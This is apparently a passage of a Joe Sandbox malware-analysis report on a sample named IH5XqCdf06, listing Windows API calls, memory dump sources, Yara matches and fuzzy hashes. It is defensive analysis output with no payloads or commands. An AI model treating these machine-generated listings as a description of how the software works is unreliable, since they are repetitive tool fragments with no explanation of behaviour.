                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00676BEC
                                                                                                    • __freea.LIBCMT ref: 00676BF5
                                                                                                      • Part of subcall function 0067390E: RtlAllocateHeap.NTDLL(00000000,0064DAD7,00000000), ref: 00673940
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                    • Instruction ID: 814014d956290379b08ebbf01b5258d38eae7ae46f3d2a0012d3947c9ee7773a
                                                                                                    • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                    • Instruction Fuzzy Hash: 5031D032A0060AABDF258F64CC81DEE7BA6EB41B10F158268FC08D7250EB35DD65CB90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                    • String ID:
                                                                                                    • API String ID: 531285432-0
                                                                                                    • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                    • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                    • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                    • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                    • String ID:
                                                                                                    • API String ID: 531285432-0
                                                                                                    • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                    • Instruction ID: 46a493f223038fa86d92ee252f21f17ec99283999201ebca48ee4cefee5c69cf
                                                                                                    • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                    • Instruction Fuzzy Hash: C8215175E001199FDF00EF94CD829BEB7BAFF09714F100069F501A7251DB71AD018B94
                                                                                                    APIs
                                                                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                      • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                    • String ID:
                                                                                                    • API String ID: 2630251706-0
                                                                                                    • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                    • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                    • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                    • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                    • UpdateWindow.USER32 ref: 00401FB7
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$MoveUpdate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1339878773-0
                                                                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                    • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                    • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                      • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                      • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                    • String ID:
                                                                                                    • API String ID: 737400349-0
                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0066934A
                                                                                                      • Part of subcall function 00669297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006692C6
                                                                                                      • Part of subcall function 00669297: ___AdjustPointer.LIBCMT ref: 006692E1
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0066935F
                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00669370
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00669398
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                    • String ID:
                                                                                                    • API String ID: 737400349-0
                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction ID: f9e2e4808c9b61dc983a2d4c5a95b08f9f9a36e5340005687a85175697b473fd
                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction Fuzzy Hash: 75012932100148BBCF126F95DC41DEB3F6EEF48754F044018FE08A6221D332E861EBA4
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                    • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0067513D,00000000,00000000,00000000,00000000,?,006753F5,00000006,0044A378), ref: 006751C8
                                                                                                    • GetLastError.KERNEL32(?,0067513D,00000000,00000000,00000000,00000000,?,006753F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00672213), ref: 006751D4
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0067513D,00000000,00000000,00000000,00000000,?,006753F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 006751E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction ID: 89ac87086795e6b4f3a6390bea9148546803cdb012ad4c316e689747db3fb645
                                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction Fuzzy Hash: CE017036612622ABC7204F789C44E977B99AF06F637204270F81FD3241C760CD01CAE4
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                    • String ID:
                                                                                                    • API String ID: 78362717-0
                                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006663AF
                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006663C3
                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 006663DB
                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006663F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                    • String ID:
                                                                                                    • API String ID: 78362717-0
                                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction ID: cde9cfbc6b5268ab9467401d1e51f560b07dd9198d60051f77176b31d393e587
                                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction Fuzzy Hash: 8101D632600614BBCF16EE59E881AEF779B9F95350F00001AFC11B7382DE71ED1596E4
                                                                                                    APIs
                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00662BB1
                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00662BCF
                                                                                                      • Part of subcall function 00658687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 006586A8
                                                                                                      • Part of subcall function 00658687: Hash.LIBCMT ref: 006586E8
                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00662BD8
                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00662BF8
                                                                                                      • Part of subcall function 0065F6DF: Hash.LIBCMT ref: 0065F6F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                    • String ID:
                                                                                                    • API String ID: 2250070497-0
                                                                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                    • Instruction ID: 70873764f5f36d93b051a54fcf66230431e11b6cc3f9861c6abea065aa045615
                                                                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                    • Instruction Fuzzy Hash: 67118E76800604AFC715DF64C8819CAF7F9FF59320F00461EE95687552DB70E904CBA4
                                                                                                    APIs
                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00662BB1
                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00662BCF
                                                                                                      • Part of subcall function 00658687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 006586A8
                                                                                                      • Part of subcall function 00658687: Hash.LIBCMT ref: 006586E8
                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00662BD8
                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00662BF8
                                                                                                      • Part of subcall function 0065F6DF: Hash.LIBCMT ref: 0065F6F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                    • String ID:
                                                                                                    • API String ID: 2250070497-0
                                                                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                    • Instruction ID: bc02c654d354dd543266972c7364f0fbd52d6349af261f4b17107518d3bd0705
                                                                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                    • Instruction Fuzzy Hash: 1B016972800605ABC714DFA5C882EDAF7E9FF48320F008A1EE55A87241DB70F904CBA4
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                    • __Getcoll.LIBCPMT ref: 00405980
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836011271-0
                                                                                                    • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                    • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                    • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                    • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 006450D1
                                                                                                      • Part of subcall function 0064BDAE: __EH_prolog3_GS.LIBCMT ref: 0064BDB5
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 0064511C
                                                                                                    • __Getcoll.LIBCPMT ref: 0064512B
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0064513B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836011271-0
                                                                                                    • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                    • Instruction ID: 70aed00bbdaad5dcabe951a73e73148633fab85e8f894f97c6431a8f02078536
                                                                                                    • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                    • Instruction Fuzzy Hash: CA019A71D11708EFEB80EFA4C441BDDB7B2BF54326F10802DE055AB282CBB49944CB99
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00645B8D
                                                                                                      • Part of subcall function 0064BDAE: __EH_prolog3_GS.LIBCMT ref: 0064BDB5
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00645BD8
                                                                                                    • __Getcoll.LIBCPMT ref: 00645BE7
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00645BF7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836011271-0
                                                                                                    • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                    • Instruction ID: a0b64eac65b4e3ac4c83a08e4941dfbb7fc00bd41ecc455bbdc4f055648537a4
                                                                                                    • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                    • Instruction Fuzzy Hash: 13014C719117089FEB80EFA4C485BDDB7B1BF14325F10802DE4556B282DBB49944CB99
                                                                                                    APIs
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3973403980-0
                                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                    APIs
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0065C170
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0065C180
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0065C190
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0065C1A4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3973403980-0
                                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction ID: 05797d803c2414ed20d00cf2a845833b639be0494fc6db20d5e4f995a5e47cc3
                                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction Fuzzy Hash: 2A01A43A404649AFDF229F94DC128AD3BA7AB45362F148415FD1884162D732CAB9AA85
                                                                                                    APIs
                                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                      • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                      • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                    • String ID:
                                                                                                    • API String ID: 4284812201-0
                                                                                                    • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                    • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                    • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                    • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                    APIs
                                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                      • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                      • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                    • GetLastError.KERNEL32 ref: 00413541
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                      • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 1674182817-0
                                                                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                    APIs
                                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00651342
                                                                                                      • Part of subcall function 00650BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00650BD6
                                                                                                      • Part of subcall function 00650BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00650BF7
                                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00651355
                                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00651361
                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0065136A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
